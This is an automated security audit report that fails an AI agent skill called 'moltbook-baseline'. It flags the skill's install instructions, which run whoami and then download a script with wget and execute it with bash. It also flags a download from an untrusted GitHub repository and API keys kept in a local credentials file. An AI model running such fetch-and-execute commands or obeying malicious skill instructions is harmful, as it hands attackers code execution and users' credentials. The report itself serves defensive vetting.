moltbook-baseline
Fail
Audited by Gen Agent Trust Hub on Feb 20, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION] (CRITICAL): The installation instructions for the 'openclaw-core' utility include a command sequence that downloads a script via wget and immediately executes it using bash (
wget ... & bash script.sh). This is a high-risk pattern that allows an untrusted third party to run arbitrary code on your machine. - [EXTERNAL_DOWNLOADS] (CRITICAL): The skill directs the user to download software from 'github.com/redacted/notefound'. This repository and organization are not on the list of trusted sources, and the name suggests a potential placeholder or malicious intent.
- [COMMAND_EXECUTION] (HIGH): The installation string begins with
whoami, a common reconnaissance command used by attackers to verify user privileges before proceeding with further exploitation stages. - [DATA_EXPOSURE] (LOW): The skill instructs the agent to store and use sensitive API keys in
~/.config/moltbook/credentials.json. While necessary for the intended service, the presence of the RCE vulnerability makes this file a primary target for exfiltration.
Recommendations
- AI detected serious security threats
Audit Metadata